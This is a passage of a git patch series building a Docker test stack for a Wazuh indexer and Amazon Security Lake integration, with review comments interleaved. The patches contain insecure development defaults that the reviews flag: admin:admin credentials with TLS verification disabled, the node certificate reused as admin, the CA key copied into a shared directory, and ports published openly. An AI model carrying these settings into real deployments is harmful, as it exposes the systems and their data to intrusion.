and dashboard" +chown 1000:1000 /certificates/* +echo "Setting UID for wazuh manager and worker" +cp /certificates/root-ca.pem /certificates/root-ca-manager.pem +cp /certificates/root-ca.key /certificates/root-ca-manager.key +chown 101:101 /certificates/root-ca-manager.pem +chown 101:101 /certificates/root-ca-manager.key + +for i in ${node_names[@]}; +do + chown 101:101 "/certificates/${i}.pem" + chown 101:101 "/certificates/${i}-key.pem" +done From 4279b6e03da530cb95b52a9a96aaf45feaebe98b Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 17:33:46 -0300 Subject: [PATCH 54/77] Add certificate config to docker compose file --- integrations/docker/amazon-security-lake.yml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 2ae38b84a4baf..9a0eedae1cb94 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -26,6 +26,15 @@ services: - discovery.type=single-node # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true + - "DISABLE_INSTALL_DEMO_CONFIG=true" + - plugins.security.ssl.http.pemcert_filepath="certs/wazuh.indexer.pem" + - plugins.security.ssl.transport.pemcert_filepath="certs/wazuh.indexer.pem" + - plugins.security.ssl.http.pemkey_filepath="certs/wazuh.indexer-key.pem" + - plugins.security.ssl.transport.pemkey_filepath="certs/wazuh.indexer-key.pem" + - plugins.security.ssl.http.pemtrustedcas_filepath="certs/root-ca.pem" + - plugins.security.ssl.transport.pemtrustedcas_filepath="certs/root-ca.pem" + - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US" + - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: memlock: @@ -36,6 +45,7 @@ services: hard: 65536 volumes: - data:/usr/share/opensearch/data + - ./certs/:/usr/share/opensearch/config/certs/ networks: - net 
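Review bot: The script downloads `wazuh-certs-tool.sh` over HTTPS and then executes it with `source /$CERT_TOOL -A` without any integrity check, so whoever controls the bucket, the CDN or the TLS path controls what runs in this container, and a truncated or failed download is sourced just the same because nothing aborts on a bad `curl`. Pin the tool's published SHA-256 and verify before sourcing, `echo "${CERT_TOOL_SHA256}  /${CERT_TOOL}" | sha256sum -c - || exit 1`, and open the script with `set -euo pipefail` so a failed fetch or copy stops cert generation instead of yielding an empty `/certificates/`. The two `curl -o ... -s` calls should also carry `-f` so an HTTP error body is never written to the script file. Separately, `cp /certificates/root-ca.key /certificates/root-ca-manager.key` duplicates the CA private key inside the shared output directory; unless a manager container is going to sign with it, the CA key should not be handed out at all.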
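Review bot: `plugins.security.authcz.admin_dn` is set to the same DN the indexer node certificate carries (`CN=wazuh.indexer,...`), which turns the node's TLS certificate into a full-privilege admin client certificate: anyone who can read `certs/wazuh.indexer-key.pem` from the whole-directory mount added here can run securityadmin and every admin REST call. Use a dedicated admin certificate, e.g. `- plugins.security.authcz.admin_dn=CN=admin,OU=Wazuh,O=Wazuh,L=California,C=US`, and mount only that key where it is needed; the `docker-compose.yml` deleted earlier in this series mounted `admin.pem`/`admin-key.pem`, which suggests the generator already produces one. Note also that in the `- key="value"` list form the double quotes are part of the YAML scalar, so OpenSearch receives the quotes inside every one of these values, including the certificate paths; the neighbouring `bootstrap.memory_lock=true` shows the unquoted form.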
@@ -73,8 +83,6 @@ services: - "9600:9600" volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - depends_on: - - wazuh.indexer networks: - net command: tail -f /dev/null From 65b3b10e2dddc1d57bc11366de0e9cf679666866 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 18:06:49 -0300 Subject: [PATCH 55/77] Use secrets for certificates --- integrations/docker/amazon-security-lake.yml | 37 +++++++++++++++----- 1 file changed, 29 insertions(+), 8 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 9a0eedae1cb94..1577df6b75187 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml 
@@ -27,14 +27,13 @@ services: # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true - "DISABLE_INSTALL_DEMO_CONFIG=true" - - plugins.security.ssl.http.pemcert_filepath="certs/wazuh.indexer.pem" - - plugins.security.ssl.transport.pemcert_filepath="certs/wazuh.indexer.pem" - - plugins.security.ssl.http.pemkey_filepath="certs/wazuh.indexer-key.pem" - - plugins.security.ssl.transport.pemkey_filepath="certs/wazuh.indexer-key.pem" - - plugins.security.ssl.http.pemtrustedcas_filepath="certs/root-ca.pem" - - plugins.security.ssl.transport.pemtrustedcas_filepath="certs/root-ca.pem" + - plugins.security.ssl.http.pemcert_filepath=/run/secrets/wazuh.indexer_http.pemcert + - plugins.security.ssl.transport.pemcert_filepath=/run/secrets/wazuh.indexer_transport.pemcert + - plugins.security.ssl.http.pemkey_filepath=/run/secrets/wazuh.indexer_http.pemkey + - plugins.security.ssl.transport.pemkey_filepath=/run/secrets/wazuh.indexer_transport.pemkey + - plugins.security.ssl.http.pemtrustedcas_filepath=/run/secrets/wazuh.indexer_http.pemtrustedcas + - plugins.security.ssl.transport.pemtrustedcas_filepath=/run/secrets/wazuh.indexer_transport.pemtrustedcas - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US" - - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: memlock: @@ -45,9 +44,15 @@ services: hard: 65536 volumes: - data:/usr/share/opensearch/data - - ./certs/:/usr/share/opensearch/config/certs/ networks: - net + secrets: + - wazuh.indexer_http.pemcert + - wazuh.indexer_transport.pemcert + - wazuh.indexer_http.pemkey + - wazuh.indexer_transport.pemkey + - wazuh.indexer_http.pemtrustedcas + - wazuh.indexer_transport.pemtrustedcas wazuh.dashboard: image: opensearchproject/opensearch-dashboards:2.11.1 @@ -64,6 +69,7 @@ services: networks: - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: 
@@ -104,6 +110,21 @@ services: volumes: data: + certs: networks: net: + +secrets: + wazuh.indexer_http.pemcert: + file: ./certs/wazuh.indexer.pem + wazuh.indexer_transport.pemcert: + file: ./certs/wazuh.indexer.pem + wazuh.indexer_http.pemkey: + file: ./certs/wazuh.indexer-key.pem + wazuh.indexer_transport.pemkey: + file: ./certs/wazuh.indexer-key.pem + wazuh.indexer_http.pemtrustedcas: + file: ./certs/root-ca.pem + wazuh.indexer_transport.pemtrustedcas: + file: ./certs/root-ca.pem From c0d6d2c8605470031822cd76d01a79b5e02499a1 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 18:11:27 -0300 Subject: [PATCH 56/77] Disable permission handling inside cert's generator entrypoint.sh --- integrations/docker/wazuh-certs-generator/entrypoint.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh index d3e0534e9be85..4e0a2d99a4197 100644 --- a/integrations/docker/wazuh-certs-generator/entrypoint.sh +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh @@ -44,14 +44,14 @@ node_names=($nodes_server) echo "Moving created certificates to the destination directory" cp /wazuh-certificates/* /certificates/ echo "Changing certificate permissions" -chmod -R 500 /certificates -chmod -R 400 /certificates/* +#chmod -R 500 /certificates +#chmod -R 400 /certificates/* echo "Setting UID indexer and dashboard" -chown 1000:1000 /certificates/* +#chown 1000:1000 /certificates/* echo "Setting UID for wazuh manager and worker" cp /certificates/root-ca.pem /certificates/root-ca-manager.pem cp /certificates/root-ca.key /certificates/root-ca-manager.key -chown 101:101 /certificates/root-ca-manager.pem +#chown 101:101 /certificates/root-ca-manager.pem chown 101:101 /certificates/root-ca-manager.key for i in ${node_names[@]}; From 017a9083fe07ea2e8356c91f4cf4a20c688f864a Mon Sep 17 00:00:00 2001 
From: Fede Tux Date: Thu, 22 Feb 2024 18:12:34 -0300 Subject: [PATCH 57/77] Back to using a bind mount for certs --- integrations/docker/amazon-security-lake.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 1577df6b75187..b8f1bc6eb0391 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -110,7 +110,6 @@ services: volumes: data: - certs: networks: net: From 2a60c41c18bd80cd3bc03032f1d5a0c8a204c7ff Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 18:46:44 -0300 Subject: [PATCH 58/77] Have entrypoint.sh generate certs with 1000:1000 ownership --- integrations/docker/amazon-security-lake.yml | 3 ++- integrations/docker/wazuh-certs-generator/entrypoint.sh | 4 ++-- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index b8f1bc6eb0391..6bf780d6eea90 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,4 +1,4 @@ -version: '3' +version: '3.8' name: "amazon-security-lake" services: @@ -53,6 +53,7 @@ services: - wazuh.indexer_transport.pemkey - wazuh.indexer_http.pemtrustedcas - wazuh.indexer_transport.pemtrustedcas + #command: tail -f /dev/null wazuh.dashboard: image: opensearchproject/opensearch-dashboards:2.11.1 diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh index 4e0a2d99a4197..15804af0803c3 100644 --- a/integrations/docker/wazuh-certs-generator/entrypoint.sh +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh 
@@ -44,10 +44,10 @@ node_names=($nodes_server) echo "Moving created certificates to the destination directory" cp /wazuh-certificates/* /certificates/ echo "Changing certificate permissions" -#chmod -R 500 /certificates +chmod -R 400 /certificates #chmod -R 400 /certificates/* echo "Setting UID indexer and dashboard" -#chown 1000:1000 /certificates/* +chown -R 1000:1000 /certificates echo "Setting UID for wazuh manager and worker" cp /certificates/root-ca.pem /certificates/root-ca-manager.pem cp /certificates/root-ca.key /certificates/root-ca-manager.key From 91da2c2bc59ce166a62e4f2168a5696b42136824 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 11:32:14 -0300 Subject: [PATCH 59/77] Correct certificate permissions and bind mounting --- integrations/docker/amazon-security-lake.yml | 40 ++++++------------- .../wazuh-certs-generator/entrypoint.sh | 22 +++++----- 2 files changed, 24 insertions(+), 38 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 6bf780d6eea90..3eeba35206169 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -20,6 +20,8 @@ services: depends_on: - wazuh-certs-generator hostname: wazuh.indexer + ports: + - 9200:9200 environment: # - cluster.name=opensearch-cluster - node.name=wazuh.indexer 
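Review bot: `ports: - 9200:9200` publishes the indexer's REST API on every host interface, and the rest of this series relies on the `admin:admin` default (see the healthcheck in PATCH 62), so on any host without a firewall this is a network-reachable OpenSearch with default credentials. For a local dev stack bind it to loopback, `- 127.0.0.1:9200:9200`, or drop the mapping entirely, since dashboards, logstash and the events generator all reach the indexer by name on the compose network. If host access is genuinely needed, say why in a comment next to the mapping.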
@@ -27,12 +29,14 @@ services: # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true - "DISABLE_INSTALL_DEMO_CONFIG=true" - - plugins.security.ssl.http.pemcert_filepath=/run/secrets/wazuh.indexer_http.pemcert - - plugins.security.ssl.transport.pemcert_filepath=/run/secrets/wazuh.indexer_transport.pemcert - - plugins.security.ssl.http.pemkey_filepath=/run/secrets/wazuh.indexer_http.pemkey - - plugins.security.ssl.transport.pemkey_filepath=/run/secrets/wazuh.indexer_transport.pemkey - - plugins.security.ssl.http.pemtrustedcas_filepath=/run/secrets/wazuh.indexer_http.pemtrustedcas - - plugins.security.ssl.transport.pemtrustedcas_filepath=/run/secrets/wazuh.indexer_transport.pemtrustedcas + - plugins.security.ssl.http.enabled=true + #- plugins.security.allow_default_init_securityindex=true + - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.transport.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.http.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem + - plugins.security.ssl.transport.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US" - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: 
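Review bot: Every certificate path in this hunk has lost its quotes, but `plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US"` still carries them, and in the `- key=value` list form the quotes are part of the scalar, so the configured admin DN begins with a literal `"` and will never match a certificate subject. Write it unquoted like its neighbours, `- plugins.security.authcz.admin_dn=CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US`, assuming that is the subject the generator puts in `wazuh.indexer.pem`. More importantly, that DN is the node certificate's own subject, so the node key doubles as the admin client key; a separate admin certificate keeps cluster-admin rights out of the file every indexer container must read.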
@@ -44,15 +48,11 @@ services: hard: 65536 volumes: - data:/usr/share/opensearch/data + - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem + - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem + - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem networks: - net - secrets: - - wazuh.indexer_http.pemcert - - wazuh.indexer_transport.pemcert - - wazuh.indexer_http.pemkey - - wazuh.indexer_transport.pemkey - - wazuh.indexer_http.pemtrustedcas - - wazuh.indexer_transport.pemtrustedcas #command: tail -f /dev/null wazuh.dashboard: @@ -114,17 +114,3 @@ volumes: networks: net: - -secrets: - wazuh.indexer_http.pemcert: - file: ./certs/wazuh.indexer.pem - wazuh.indexer_transport.pemcert: - file: ./certs/wazuh.indexer.pem - wazuh.indexer_http.pemkey: - file: ./certs/wazuh.indexer-key.pem - wazuh.indexer_transport.pemkey: - file: ./certs/wazuh.indexer-key.pem - wazuh.indexer_http.pemtrustedcas: - file: ./certs/root-ca.pem - wazuh.indexer_transport.pemtrustedcas: - file: ./certs/root-ca.pem diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh index 15804af0803c3..6e51d6e4cb423 100644 --- a/integrations/docker/wazuh-certs-generator/entrypoint.sh +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh 
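Review bot: The three per-file bind mounts are a clear improvement over mounting all of `./certs/`, but they are read-write, so a compromised or misbehaving indexer process could overwrite the node key or the trusted CA on the host. Append `:ro` to each, e.g. `- ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem:ro`; OpenSearch only reads these files, never writes them. The enclosing `wazuh.indexer` service definition starts before this hunk.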
@@ -44,18 +44,18 @@ node_names=($nodes_server) echo "Moving created certificates to the destination directory" cp /wazuh-certificates/* /certificates/ echo "Changing certificate permissions" -chmod -R 400 /certificates -#chmod -R 400 /certificates/* +chmod 700 /certificates +chmod 400 /certificates/* echo "Setting UID indexer and dashboard" chown -R 1000:1000 /certificates -echo "Setting UID for wazuh manager and worker" -cp /certificates/root-ca.pem /certificates/root-ca-manager.pem -cp /certificates/root-ca.key /certificates/root-ca-manager.key +#echo "Setting UID for wazuh manager and worker" +#cp /certificates/root-ca.pem /certificates/root-ca-manager.pem +#cp /certificates/root-ca.key /certificates/root-ca-manager.key #chown 101:101 /certificates/root-ca-manager.pem -chown 101:101 /certificates/root-ca-manager.key +#chown 101:101 /certificates/root-ca-manager.key -for i in ${node_names[@]}; -do - chown 101:101 "/certificates/${i}.pem" - chown 101:101 "/certificates/${i}-key.pem" -done +#for i in ${node_names[@]}; +#do +# chown 101:101 "/certificates/${i}.pem" +# chown 101:101 "/certificates/${i}-key.pem" +#done From 55f07264dd116379b9214cde88cc4f205f9764c0 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 11:52:25 -0300 Subject: [PATCH 60/77] Add security initialization variable to compose file --- integrations/docker/amazon-security-lake.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 3eeba35206169..91fc8fcff887a 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml 
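Review bot: The hunk turns the manager-specific cp/chown block into a run of commented-out lines rather than deleting it; the compose file in this series has no manager service and git keeps the history, so delete the block instead of leaving dead code the next reader has to evaluate. The `chown -R 1000:1000 /certificates` plus `chmod 400 /certificates/*` pair is right for the indexer and dashboard containers, but it also hands the CA private key to uid 1000, because the `cp /wazuh-certificates/* /certificates/` line above copies `root-ca.key` along with everything else (the old manager block referenced that file). Consider `rm -f /certificates/root-ca.key` after the copy, or copying only the `*.pem` files the compose file actually mounts.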
@@ -30,7 +30,7 @@ services: - bootstrap.memory_lock=true - "DISABLE_INSTALL_DEMO_CONFIG=true" - plugins.security.ssl.http.enabled=true - #- plugins.security.allow_default_init_securityindex=true + - plugins.security.allow_default_init_securityindex=true - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem From 454d6fdb918f3337f58b7240b94a1aa4a67326b0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 23 Feb 2024 18:11:11 +0100 Subject: [PATCH 61/77] Add S3 Ninja (Mock) --- integrations/docker/amazon-security-lake.yml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 5c2b09d133089..d44598029eb0f 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -48,6 +48,7 @@ services: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: @@ -58,6 +59,8 @@ services: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" MONITORING_ENABLED: false + AWS_KEY: "AKIAIOSFODNN7EXAMPLE" + AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" ports: - "5000:5000/tcp" - "5000:5000/udp" 
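Review bot: Enabling `plugins.security.allow_default_init_securityindex=true` makes the node seed its security index from whatever `opensearch-security/*.yml` ships in the image, and nothing in this compose file mounts a custom set, so the cluster comes up with the image's bundled users; the `admin:admin` used by the healthcheck added later in this series suggests that is the demo `internal_users.yml`. Mount your own `internal_users.yml` with a fresh bcrypt hash (the deleted `docker-compose.yml` did exactly that: `./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml`), or run securityadmin once and leave this flag off. At minimum add `# dev only: seeds the security index from the image's bundled demo users` so the setting is not copied into a real deployment.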
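Review bot: `AWS_KEY` and `AWS_SECRET` are placed directly in the committed compose environment; the values are AWS's documentation example pair, so nothing is leaked here, but this is exactly the pattern that gets copied into a real deployment with real keys. Source them from an untracked `.env`, `AWS_KEY: ${AWS_KEY:?}` / `AWS_SECRET: ${AWS_SECRET:?}`, and note in a comment that a real key should be scoped to `s3:PutObject` on the Security Lake bucket only. The names also differ from the `AWS_ACCESS_KEY_ID`/`AWS_SECRET_ACCESS_KEY` that AWS SDKs read by default, so whatever consumes them inside the integration container (not visible in this hunk) has to pass them on explicitly.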
@@ -72,8 +75,20 @@ services: command: tail -f /dev/null # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + s3.ninja: + image: scireum/s3-ninja:latest + container_name: s3.ninja + hostname: s3.ninja + ports: + - "9444:9000" + volumes: + - s3-data:/home/sirius/data + networks: + - net + volumes: data: + s3-data: networks: net: \ No newline at end of file From a9f95723a9d439ba289a4ee63b44f8dc99ab58dd Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 23 Feb 2024 15:53:03 -0300 Subject: [PATCH 62/77] Fix permissions on certs generator entrypoint --- .../pipeline/indexer-to-integrator.conf | 21 +++++---- integrations/docker/amazon-security-lake.yml | 47 +++++++------------ .../wazuh-certs-generator/entrypoint.sh | 8 +++- 3 files changed, 38 insertions(+), 38 deletions(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 0cc7a7d089ec3..7784619a799ea 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf @@ -3,7 +3,8 @@ input { hosts => ["opensearch-node:9200"] user => "${INDEXER_USERNAME}" password => "${INDEXER_PASSWORD}" - ssl => false + ssl => true + ca_file => "/usr/share/logstash/root-ca.pem" index => "wazuh-alerts-4.x-*" query => '{ "query": { @@ -21,14 +22,18 @@ input { output { - stdout { codec => rubydebug } - - pipe + stdout { - id => "securityLake" - message_format => "%{_source}" - ttl => "10" - command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + id => "standardOutputPipeline" + codec => rubydebug } + #pipe + #{ + # id => "securityLake" + # message_format => "%{_source}" + # ttl => "10" + # command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + #} + } 
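Review bot: `scireum/s3-ninja:latest` is unpinned and its port is published as `9444:9000` on all host interfaces, so the mock bucket that will receive exported alerts is reachable from the network with whatever default credentials the image ships. Pin a tag or digest, as the series already does for opensearch (`2.11.1`), and bind the mapping to loopback, `- 127.0.0.1:9444:9000`. A comment such as `# mock S3 for local testing only; never point real Security Lake credentials at it` would also help.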
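Review bot: The input still points at `hosts => ["opensearch-node:9200"]` while PATCH 52 renamed the service to `wazuh.indexer` and `certs.yml` issues the certificate for that name, so with the new `ssl => true` and `ca_file` the connection will fail to resolve, and even with a network alias the hostname check against the certificate would presumably not pass. Change it to `hosts => ["wazuh.indexer:9200"]`. The commented-out `pipe` output in the second hunk leaves the pipeline with no Security Lake sink at all; if that is intentional for now, a `# TODO(owner): re-enable once stdin_to_securitylake.py is packaged into the image` reads better than a dead block.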
diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 91fc8fcff887a..a8735de543b4d 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -8,17 +8,16 @@ services: context: ../tools/events-generator container_name: events-generator depends_on: - - wazuh.indexer - networks: - - net - # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. - command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" + wazuh.indexer: + condition: service_healthy + command: bash -c "python run.py -a wazuh.indexer" wazuh.indexer: image: opensearchproject/opensearch:2.11.1 container_name: wazuh.indexer depends_on: - - wazuh-certs-generator + wazuh-certs-generator: + condition: service_completed_successfully hostname: wazuh.indexer ports: - 9200:9200 @@ -46,13 +45,15 @@ services: nofile: soft: 65536 hard: 65536 + healthcheck: + test: curl -sku admin:admin https://localhost:9200/_cat/health | grep -q docker-cluster + start_period: 10s + start_interval: 3s volumes: - data:/usr/share/opensearch/data - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem - networks: - - net #command: tail -f /dev/null wazuh.dashboard: @@ -67,9 +68,6 @@ services: - "5601" # Expose port 5601 for web access to OpenSearch Dashboards environment: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query - networks: - - net - wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration 
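Review bot: The healthcheck `curl -sku admin:admin https://localhost:9200/_cat/health` bakes the default password into the compose file and disables certificate verification with `-k`, even though this same service mounts `root-ca.pem` at `/usr/share/opensearch/config/root-ca.pem` and the certificate is issued for `wazuh.indexer`. Use `test: curl -fs --cacert /usr/share/opensearch/config/root-ca.pem -u "admin:$${INDEXER_PASSWORD}" https://wazuh.indexer:9200/_cat/health | grep -q docker-cluster` with the password supplied through the service environment rather than inline. `start_interval` is honoured only by recent Compose/Engine releases and silently ignored by older ones, which is worth a comment beside it. The `wazuh.indexer` service definition starts before this hunk.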
@@ -90,27 +88,18 @@ services: - "9600:9600" volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - networks: - - net - command: tail -f /dev/null - # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash + - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem + #command: tail -f /dev/null + command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic wazuh-certs-generator: - image: wazuh-certs-generator - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt-get update && apt-get install openssl curl -y - WORKDIR / - COPY wazuh-certs-generator/entrypoint.sh / - RUN chmod 700 /entrypoint.sh - ENTRYPOINT ["/entrypoint.sh"] + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + container_name: wazuh-certs-generator + entrypoint: sh -c "/entrypoint.sh; chown -R 1000:999 /certificates; chmod 740 /certificates; chmod 440 /certificates/*" volumes: - ./certs/:/certificates/ - - ./wazuh-certs-generator/certs.yml:/config/certs.yml - + - ./config/certs.yml:/config/certs.yml + volumes: data: - -networks: - net: diff --git a/integrations/docker/wazuh-certs-generator/entrypoint.sh b/integrations/docker/wazuh-certs-generator/entrypoint.sh index 6e51d6e4cb423..2d173c2943692 100644 --- a/integrations/docker/wazuh-certs-generator/entrypoint.sh +++ b/integrations/docker/wazuh-certs-generator/entrypoint.sh @@ -45,7 +45,7 @@ echo "Moving created certificates to the destination directory" cp /wazuh-certificates/* /certificates/ echo "Changing certificate permissions" chmod 700 /certificates -chmod 400 /certificates/* +chmod 440 /certificates/* echo "Setting UID indexer and dashboard" chown -R 1000:1000 /certificates #echo "Setting UID for wazuh manager and worker" 
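Review bot: The override `entrypoint: sh -c "/entrypoint.sh; chown -R 1000:999 /certificates; chmod 740 /certificates; chmod 440 /certificates/*"` undoes what the script it wraps just did: the entrypoint.sh hunks of this same commit (the second one follows) end by setting every `*key*` file to `400`, and the trailing `chmod 440 /certificates/*` re-opens each private key to group 999. With `;` as separator the chown/chmod also run after a failed generator, and the status Compose evaluates for `service_completed_successfully` is that of the last chmod rather than of `/entrypoint.sh`. Keep ownership and modes in one place, either by passing the target GID to the script or by letting the script do the chown, and chain with `&&`: `entrypoint: sh -c "/entrypoint.sh && chown -R 1000:999 /certificates"`. A comment naming which container's group 999 is would also help, since the script itself uses `1000:1000`.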
@@ -59,3 +59,9 @@ chown -R 1000:1000 /certificates
 # chown 101:101 "/certificates/${i}.pem"
 # chown 101:101 "/certificates/${i}-key.pem"
 #done
+
+for i in /certificates/*key*
+do
+ chmod 400 $i
+done
+
From c854dc509cb852d39ceee41f310b897866c6c76f Mon Sep 17 00:00:00 2001
From: Fede Tux
Date: Fri, 23 Feb 2024 15:55:00 -0300
Subject: [PATCH 63/77] Add cert generator config file
---
 integrations/docker/config/certs.yml | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100644 integrations/docker/config/certs.yml
diff --git a/integrations/docker/config/certs.yml b/integrations/docker/config/certs.yml
new file mode 100644
index 0000000000000..c3e017be10eea
--- /dev/null
+++ b/integrations/docker/config/certs.yml
@@ -0,0 +1,16 @@
+nodes:
+ # Wazuh indexer server nodes
+ indexer:
+ - name: wazuh.indexer
+ ip: wazuh.indexer
+
+ # Wazuh server nodes
+ # Use node_type only with more than one Wazuh manager
+ server:
+ - name: wazuh.manager
+ ip: wazuh.manager
+
+ # Wazuh dashboard node
+ dashboard:
+ - name: wazuh.dashboard
+ ip: wazuh.dashboard
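Review bot: `chmod 400 $i` in the new loop leaves the path unquoted and the glob unguarded: when `/certificates/*key*` matches nothing the body runs once on the literal pattern and chmod reports an error, and a name containing whitespace would be word-split. Quote and guard it, `for i in /certificates/*key*; do [ -f "$i" ] || continue; chmod 400 "$i"; done`. The pattern also catches `root-ca.key` alongside the `*-key.pem` node keys, which looks intended; a comment saying so saves the next reader a check, e.g. `# Lock down every private key, including root-ca.key`.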
@@ -1,16 +0,0 @@
-nodes:
- # Wazuh indexer server nodes
- indexer:
- - name: wazuh.indexer
- ip: wazuh.indexer
-
- # Wazuh server nodes
- # Use node_type only with more than one Wazuh manager
- server:
- - name: wazuh.manager
- ip: wazuh.manager
-
- # Wazuh dashboard node
- dashboard:
- - name: wazuh.dashboard
- ip: wazuh.dashboard
